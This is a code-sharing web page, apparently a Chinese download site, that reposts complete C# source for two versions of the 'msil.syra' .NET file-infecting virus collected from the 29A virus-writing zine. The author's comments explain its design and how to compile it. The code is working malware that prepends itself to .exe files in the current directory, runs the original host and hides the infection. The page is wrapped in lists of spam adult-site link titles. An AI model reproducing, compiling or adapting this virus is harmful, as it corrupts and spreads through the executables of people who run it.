亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? 29a-7.019

?? 從29A上收集的病毒源碼
?? 019
?? 第 1 頁 / 共 3 頁
字號:

class msil_syra_by_alcopaul
{
   public class Win32 {
   [DllImport("shell32.dll", CharSet=CharSet.Auto)]
   public static extern int ShellExecute(int hWnd, String oper, String file, String param, 
                     String dir, int type);
   [DllImport("user32.dll", CharSet=CharSet.Auto)]
   public static extern int MessageBox(int hWnd, String text, 
                     String caption, uint type);
   }
  public static void Main(String[] args)
   {
   Module exename = Assembly.GetExecutingAssembly().GetModules()[0];
   string[] files = Directory.GetFiles(Directory.GetCurrentDirectory(), "*.exe");
   foreach (string file in files){
   try
   {
   AssemblyName.GetAssemblyName(file); // !!!! check if msil :: on error goto next file
   FileStream fs = new FileStream(file, FileMode.OpenOrCreate, FileAccess.Read);
   StreamReader r = new StreamReader(fs);
   int fff = (int) fs.Length;
   int rrr = fff - 4;
   r.BaseStream.Seek(rrr, SeekOrigin.Begin);
   string g = r.ReadLine();
   r.Close();
   string hhh = "alco";
   if (g==hhh)
   continue;
   else
   if (file==exename.FullyQualifiedName)
   continue;
   else
   try
      {  
      Infect(file);
      }
   catch
      {
      continue;
      }
   break;
   }
   catch
   {
   continue;
   }
   }
   FileStream fs1 = new FileStream(exename.FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read);
   BinaryReader r1 = new BinaryReader(fs1);
   int host = (int) fs1.Length;
   int vir = host - 5120;
   r1.BaseStream.Seek(5120, SeekOrigin.Begin);
   byte[] bytes = new byte[vir];
   int numBytesToRead = vir;
   int numBytesRead = 0;
   while (numBytesToRead > 0)
   {
   int n = r1.Read(bytes, numBytesRead, numBytesToRead);
   if (n==0)
   break;
   numBytesRead += n;
   numBytesToRead -= n;
   }
   r1.Close();
   FileStream fs11 = new FileStream("_U-.exe", FileMode.OpenOrCreate, FileAccess.Write);
   BinaryWriter w1 = new BinaryWriter(fs11);         
   w1.BaseStream.Seek(0, SeekOrigin.Begin);
   w1.Write(bytes);
   w1.Close();
   string rect = Directory.GetCurrentDirectory();
   Win32.ShellExecute(0, null, "_U-.exe", null, rect, 1);
   wet:
      try
      {
      File.Delete("_U-.exe");
      }
      catch
      {
      goto wet;
      }
      if (File.Exists("_U-.exe")==true)
      goto wet;
   Win32.MessageBox(0, "::: now infecting dotnet files only :P :::", "msil.syra.b by alcopaul",
                   0);
}
   public static void Infect(string host)
   { 
     Module mod = Assembly.GetExecutingAssembly().GetModules()[0];
     FileStream fs = new FileStream(mod.FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read);
     BinaryReader r = new BinaryReader(fs);        
     r.BaseStream.Seek(0, SeekOrigin.Begin);
     byte[] bytes = new byte[5120];
     int numBytesToRead = (int) 5120;
     int numBytesRead = 0;
     while (numBytesToRead > 0)
     {
     int n = r.Read(bytes, numBytesRead, numBytesToRead);
     if (n==0)
     break;
     numBytesRead += n;
     numBytesToRead -= n;
    }
     r.Close();
     FileStream fs133 = new FileStream(host, FileMode.OpenOrCreate, FileAccess.Read);
     BinaryReader w33 = new BinaryReader(fs133);
     w33.BaseStream.Seek(0, SeekOrigin.Begin);
     byte[] bytes2 = new byte[fs133.Length];
     int numBytesToRead2 = (int) fs133.Length;
     int numBytesRead2 = 0;
     while (numBytesToRead2 > 0)
     {
     int n = w33.Read(bytes2, numBytesRead2, numBytesToRead2);
     if (n==0)
     break;
     numBytesRead2 += n;
     numBytesToRead2 -= n;
     }
     w33.Close();
     FileStream fs1 = new FileStream(host, FileMode.OpenOrCreate, FileAccess.Write);
     BinaryWriter w = new BinaryWriter(fs1);         
     w.BaseStream.Seek(0, SeekOrigin.Begin);
     w.Write(bytes);
     w.Write(bytes2);
     w.Write("alco");
     w.Close();
  }
}

//////////////////////////////
/////// syra.c //////////////
////////////////////////////

//// msil.syra history
////
////  version a - prepends itself to w32 pe exe and msil exe files in current directory. inserts four byte marker
////              at the end of infected files. original hosts are regenerated to a single hardcoded file...
////
////  version b - prepends itself to msil exe files only in current directory. inserts four byte marker at the end
////              of infected files. original hosts are regenerated to a single hardcoded file...
////
////  syra.c prepends itself to msil exe files only in current directory. instead of inserting a four byte marker to
////  infected files, it uses SHA1 for anti-host reinfection and anti-self infection. original hosts are regenerated to
////  multiple files, so infected users won't know that there's something wrong with their dotnet files..
////
////  compilation :
////
////  csc /target:winexe thisfile
////
////
////  enjoy,
////
////  alcopaul
////  brigada ocho & rrlf
////  september 30, 2002
////
////  http://alcopaul.host.sk
////  alcopaulvx@yahoo.com
////
////  greets
////  
////  brigada ocho (let us be THE HLL group.. :) )
////  rrlf (my home when i was lamer than lame)
////  philie (hehehe, what can i say, you adopted me when i was newbie)
////  slagehammer (thanks for the guidance when i was a newbie)
////  jackie (thanks for appreciating my work. one of my vx inspiration)
////  virusbuster (thanks for the avp.key, man.. and i hope you'll publish my contributions in 29a#7.. :) )
////  energy (let us always make projects together)
////  petik (come back! :) )
////  arkhangel (thanks for hosting our page)
////  herm1t (same as arkhangel's message)
////  secuxp (nihau!)
////  perrun fans and critics (the true jpeg virus will come out in the future. just ask microsoft..)
////  my fans (if any) (thanks for appreciating my works)
////  vxers (let us all explore the robust world of dotnet)
////
////
////   
////
//////////////////////////////////// warning : this is a harmless virus source code /////////////////////////////////////////

using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Security.Cryptography;

class msil_syra_c
{
   public class w32api // i'm using the dotnet sdk in windows me (heheheh) so i can't call some essential dotnet classes at development :(
   {
   [DllImport("shell32.dll", CharSet=CharSet.Auto)]
   public static extern int ShellExecute(int hWnd, String oper, String file, String param, String dir, int type);
   [DllImport("user32.dll", CharSet=CharSet.Auto)]
   public static extern int MessageBox(int hWnd, String text, String caption, uint type);
   }
   public static void Main(String[] args)
   {
   Module self = Assembly.GetExecutingAssembly().GetModules()[0]; // thanks to Reflection
   string[] hostfiles = Directory.GetFiles(Directory.GetCurrentDirectory(), "*.exe"); // gather the hostesses
   foreach (string hostfile in hostfiles){
   try
   {
   AssemblyName.GetAssemblyName(hostfile); // check if msil using managed seh
   // msil file then examine for previous infection using SHA1
   if (Sha1(self.FullyQualifiedName)==Sha1(hostfile)) // get sha1
   continue;
   else
   try
   {  
   Infect(hostfile); // the meat of the routine
   }
   catch
   {
   continue; // error infecting file (maybe it's running/readonly/etc.) .. goto next file
   }
   break; // end after 1 infection
   }
   catch
   {
   continue; // dotnot, next file
   }
   }
   // extract host bytes from itself
   FileStream fs1 = new FileStream(self.FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read);
   BinaryReader r1 = new BinaryReader(fs1);
   int host = (int) fs1.Length;
   int vir = host - 5632;
   r1.BaseStream.Seek(5632, SeekOrigin.Begin);
   byte[] bytes = new byte[vir];
   int numBytesToRead = vir;
   int numBytesRead = 0;
   while (numBytesToRead > 0)
   {
   int n = r1.Read(bytes, numBytesRead, numBytesToRead);
   if (n==0)
   break;
   numBytesRead += n;
   numBytesToRead -= n;
   }
   r1.Close();
   // save host to file
   Random ran = new Random();
   int ty = ran.Next(2000);
   FileStream fs11 = new FileStream("p" + ty + "h.exe", FileMode.OpenOrCreate, FileAccess.Write);
   BinaryWriter w1 = new BinaryWriter(fs11);         
   w1.BaseStream.Seek(0, SeekOrigin.Begin);
   w1.Write(bytes);
   w1.Close();
   string rect = Directory.GetCurrentDirectory();
   // execute host
   w32api.ShellExecute(0, null, "p" + ty + "h.exe", null, rect, 1);
   // use SEH to wait for host to terminate and delete it
   wet:
   try
   {
   File.Delete("p" + ty + "h.exe");
   }
   catch
   {
   goto wet;
   }
   if (File.Exists("p" + ty + "h.exe")==true)
   goto wet;
   // display messagebox (25% probability)
   Random t = new Random();
   if (t.Next(4)==3)
   w32api.MessageBox(0, "::::only SHA1gging .NET files::::", "msil.syra.c by alcopaul", 0);
   }
   public static void Infect(string host)
   { 
     // read self
     Module mod = Assembly.GetExecutingAssembly().GetModules()[0];
     FileStream fs = new FileStream(mod.FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read);
     BinaryReader r = new BinaryReader(fs);        
     r.BaseStream.Seek(0, SeekOrigin.Begin);
     byte[] bytes = new byte[5632];
     int numBytesToRead = (int) 5632;
     int numBytesRead = 0;
     while (numBytesToRead > 0)
     {
     int n = r.Read(bytes, numBytesRead, numBytesToRead);
     if (n==0)
     break;
     numBytesRead += n;
     numBytesToRead -= n;
      }
     r.Close();
     // read host
     FileStream fs133 = new FileStream(host, FileMode.OpenOrCreate, FileAccess.Read);
     BinaryReader w33 = new BinaryReader(fs133);
     w33.BaseStream.Seek(0, SeekOrigin.Begin);
     byte[] bytes2 = new byte[fs133.Length];
     int numBytesToRead2 = (int) fs133.Length;
     int numBytesRead2 = 0;
     while (numBytesToRead2 > 0)
     {
     int n = w33.Read(bytes2, numBytesRead2, numBytesToRead2);
     if (n==0)
     break;
     numBytesRead2 += n;
     numBytesToRead2 -= n;
     }
     w33.Close();
     // save self + host to hostfile
     FileStream fs1 = new FileStream(host, FileMode.OpenOrCreate, FileAccess.Write);
     BinaryWriter w = new BinaryWriter(fs1);         
     w.BaseStream.Seek(0, SeekOrigin.Begin);
     w.Write(bytes);
     w.Write(bytes2);
     w.Close();
     }
   public static string Sha1(string data) // get SHA1 of first 2048 bytes of input file
   {
   // why 2048? 2048 is the minimun file size that ilasm produces... we don't want some errors to happen here, ei!
   FileStream FSsha = new FileStream(data, FileMode.OpenOrCreate, FileAccess.Read);
   BinaryReader BRsha = new BinaryReader(FSsha);
   BRsha.BaseStream.Seek(0, SeekOrigin.Begin);
   byte[] Bsha = new byte[2048];
   int B2R = 2048;
   int BR = 0;
   while (B2R > 0)
   {
   int n1 = BRsha.Read(Bsha, BR, B2R);
   if (n1==0)
   break;
   BR += n1;
   B2R -= n1;
   }
   BRsha.Close();
   SHA1 sha = new SHA1CryptoServiceProvider(); 
   byte[] result = sha.ComputeHash(Bsha); // result contains the SHA1 byte represention of the 2048 input data
   return BytesToHexString(result); // we need to convert that byte rep to hex rep..
   }
   static String BytesToHexString(byte[] bytes) // excerpt from http://support.microsoft.com/default.aspx?scid=kb;en-us;Q312906
   {						// antivirus companies must thank virus writers and we, virus writers must
						// thank microsoft.. :)
   StringBuilder hexString = new StringBuilder(64);
   for (int counter = 0; counter < bytes.Length; counter++) 
   {
   hexString.Append(String.Format("{0:X2}", bytes[counter]));
   }
   return hexString.ToString();
   }
}

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
亚洲蜜臀av乱码久久精品| 亚洲成人综合网站| 欧美日韩精品福利| 国产福利一区在线| 日韩国产精品大片| 亚洲精品大片www| 久久久久久久免费视频了| 欧美精品一二三区| 91视频在线观看| 国产成人精品影视| 卡一卡二国产精品 | 色噜噜偷拍精品综合在线| 韩国三级电影一区二区| 午夜视频一区二区| 一区二区国产视频| 亚洲丝袜制服诱惑| 国产欧美日韩亚州综合| 精品久久久三级丝袜| 91精品国产综合久久蜜臀| 日本韩国欧美一区| 99视频一区二区| 成人av资源在线观看| 国产成a人无v码亚洲福利| 久久国产精品色| 奇米888四色在线精品| 亚洲成人一二三| 亚洲风情在线资源站| 一区二区在线观看av| 亚洲天堂福利av| 国产精品国产馆在线真实露脸| 久久精品人人做人人综合| 欧美大度的电影原声| 7777精品伊人久久久大香线蕉经典版下载 | 欧美一级在线观看| 欧美日本韩国一区二区三区视频| 91蜜桃婷婷狠狠久久综合9色| 高清久久久久久| 岛国一区二区在线观看| www.亚洲激情.com| 成人av资源在线观看| 99国产精品一区| 91在线观看美女| 在线中文字幕不卡| 亚洲丝袜制服诱惑| 亚洲人123区| 亚洲资源中文字幕| 亚洲高清在线视频| 日韩av网站在线观看| 久久国产日韩欧美精品| 国内成人免费视频| 成人国产精品免费观看动漫| 91视频www| 欧美三级三级三级爽爽爽| 3d动漫精品啪啪| 精品国产乱码久久久久久闺蜜| 久久综合av免费| 国产精品私人自拍| 亚洲一区二区三区爽爽爽爽爽| 日韩国产欧美在线视频| 国产一区二区三区四| av中文字幕不卡| 欧美日韩三级在线| 精品久久人人做人人爰| 国产精品不卡一区二区三区| 一区二区激情小说| 久久97超碰国产精品超碰| 国产成人福利片| 色老头久久综合| 日韩午夜在线观看| 国产精品久久久久久久久图文区 | 婷婷中文字幕综合| 精品一区中文字幕| 91在线一区二区三区| 欧美日韩1234| 国产女人18水真多18精品一级做| 玉足女爽爽91| 黑人巨大精品欧美黑白配亚洲| av在线不卡观看免费观看| 在线观看免费一区| 久久综合色8888| 一区二区三区在线不卡| 韩国精品免费视频| 色婷婷亚洲综合| 欧美精品一区二| 亚洲综合在线第一页| 国产成人综合在线观看| 欧美群妇大交群中文字幕| 国产精品美女久久久久久2018 | 亚洲午夜一区二区| 国产成人av影院| 6080国产精品一区二区| 中文字幕亚洲一区二区av在线| 男女男精品视频网| 91久久国产最好的精华液| 久久精品免费在线观看| 亚洲午夜精品网| 成人免费va视频| 精品国产免费视频| 亚洲成人精品影院| 91在线精品一区二区| 久久亚洲一区二区三区四区| 亚洲一区中文日韩| 不卡的av电影| 国产亚洲制服色| 美女一区二区三区在线观看| 欧美色网站导航| 中文字幕第一区第二区| 国产真实乱偷精品视频免| 欧美一区二区性放荡片| 亚洲一区二区三区影院| 欧美精品一区二区三| 视频一区二区中文字幕| 色狠狠综合天天综合综合| 国产精品久久久久久久久动漫| 精品一区二区三区蜜桃| 911精品产国品一二三产区| 亚洲美女一区二区三区| 91在线播放网址| 国产精品国产成人国产三级| 成人免费视频网站在线观看| 精品三级在线看| 六月丁香综合在线视频| 欧美大片在线观看一区二区| 日韩电影免费在线看| 91精品国产一区二区三区| 亚洲五码中文字幕| 欧美婷婷六月丁香综合色| 一区二区成人在线| 91成人国产精品| 亚洲无线码一区二区三区| 欧美性猛交xxxx黑人交| 亚洲国产成人av好男人在线观看| 欧美丝袜丝交足nylons| 亚洲永久免费av| 欧美系列一区二区| 天堂影院一区二区| 日韩欧美国产一区二区三区| 美女一区二区在线观看| www一区二区| 国产成人免费高清| 18成人在线视频| 色视频成人在线观看免| 午夜亚洲国产au精品一区二区| 欧美男同性恋视频网站| 男女性色大片免费观看一区二区| 欧美大尺度电影在线| 国产一区二区伦理片| 国产精品色眯眯| 色94色欧美sute亚洲线路一久| 亚洲制服欧美中文字幕中文字幕| 欧美久久一二区| 久久综合综合久久综合| 久久精品视频网| 91麻豆国产在线观看| 亚洲一区二区五区| 91精品国产欧美一区二区成人| 久久9热精品视频| 欧美国产精品劲爆| 91麻豆产精品久久久久久| 亚洲成a人v欧美综合天堂下载| 日韩欧美久久一区| 成人国产电影网| 午夜精品影院在线观看| 日韩欧美电影在线| 成人国产在线观看| 午夜国产不卡在线观看视频| 久久免费的精品国产v∧| 93久久精品日日躁夜夜躁欧美| 三级欧美在线一区| 国产亚洲婷婷免费| 色婷婷国产精品| 精品伊人久久久久7777人| 最近日韩中文字幕| 欧美一区二区久久久| 暴力调教一区二区三区| 日韩av电影天堂| 国产精品视频在线看| 在线成人高清不卡| 懂色一区二区三区免费观看| 丝袜美腿一区二区三区| 国产精品久久午夜| 制服视频三区第一页精品| av电影在线观看一区| 免费成人在线影院| 自拍av一区二区三区| 欧美videos中文字幕| 在线视频国内自拍亚洲视频| 国产在线播精品第三| 亚洲国产精品久久艾草纯爱| 国产精品色噜噜| 欧美大黄免费观看| 欧美日韩一区中文字幕| 成人午夜在线播放| 免费观看91视频大全| 亚洲一区av在线| 国产精品久线在线观看| 精品国产乱码久久久久久牛牛| 欧美亚洲动漫精品| 91精品蜜臀在线一区尤物| 色哟哟在线观看一区二区三区|